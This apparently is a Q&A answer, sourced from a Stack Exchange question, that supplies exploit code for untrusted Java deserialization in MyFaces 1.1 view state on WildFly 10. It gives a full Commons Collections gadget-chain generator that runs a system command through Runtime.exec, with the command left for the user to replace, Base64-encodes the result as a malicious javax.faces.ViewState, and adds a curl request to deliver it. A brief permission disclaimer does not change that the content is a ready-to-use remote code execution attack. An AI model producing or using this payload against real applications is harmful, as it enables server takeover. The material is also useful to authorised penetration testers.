请求MyFaces 1.1在WildFly 10下不可信数据反序列化测试示例代码
Got it, let's break down how to test this deserialization vulnerability. MyFaces 1.1 stores view state as a serialized Java object encoded in Base64, so manipulating this value can trigger untrusted deserialization if gadget chains exist in the classpath. Below's a practical example to generate a malicious payload and test it.
Prerequisites
- A WildFly 10 instance running a web app using MyFaces 1.1
- The app's classpath includes a gadget chain library (e.g., Commons Collections 3.x, common with older MyFaces setups)
- A Java dev environment with access to relevant libraries
Example Code to Generate Malicious View State
This example uses the Commons Collections 3.x gadget chain to create a payload that executes a system command, then encodes it to match MyFaces' Base64 view state format.
1. Malicious Payload Generator
import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import java.io.ByteArrayOutputStream; import java.io.ObjectOutputStream; import java.util.Base64; import java.util.HashMap; import java.util.Map; public class MyFacesDeserializationTest { public static void main(String[] args) throws Exception { // Build transformer chain to execute a system command Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"touch /tmp/myfaces_exploit_success"}) // Replace with your target command }; Transformer chainedTransformer = new ChainedTransformer(transformers); // Wrap in LazyMap (triggered when MyFaces processes the view state) Map<String, Object> baseMap = new HashMap<>(); Map<String, Object> maliciousMap = LazyMap.decorate(baseMap, chainedTransformer); // Trigger the transformation logic (ensures the chain is initialized) maliciousMap.get("trigger"); // Serialize the malicious object ByteArrayOutputStream byteOut = new ByteArrayOutputStream(); ObjectOutputStream objOut = new ObjectOutputStream(byteOut); objOut.writeObject(maliciousMap); objOut.close(); // Encode to Base64 (matches MyFaces view state encoding) String maliciousViewState = Base64.getEncoder().encodeToString(byteOut.toByteArray()); System.out.println("Generated Malicious View State:\n" + maliciousViewState); } }
2. Submit the Payload to the Application
Once you have the Base64 payload, send it as the javax.faces.ViewState parameter in a POST request to any MyFaces-powered page. Use curl or a tool like Burp Suite for this:
curl -X POST http://your-wildfly-host:8080/your-app/faces/target-page.xhtml \ -d "javax.faces.ViewState=YOUR_BASE64_PAYLOAD_HERE" \ -d "form_submit_param=value" # Add other required form parameters
Key Notes
- Gadget Chain Compatibility: If your target app doesn't use Commons Collections, adjust the payload to use another available chain (e.g., Java's
TemplatesImplif present). - WildFly 10 Classloader: Ensure the gadget library is part of the app's deployment (not just WildFly's core modules) so the payload can access the required classes.
- Ethical Testing: Only run this against systems you own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.
内容的提问来源于stack exchange,提问作者user1374266

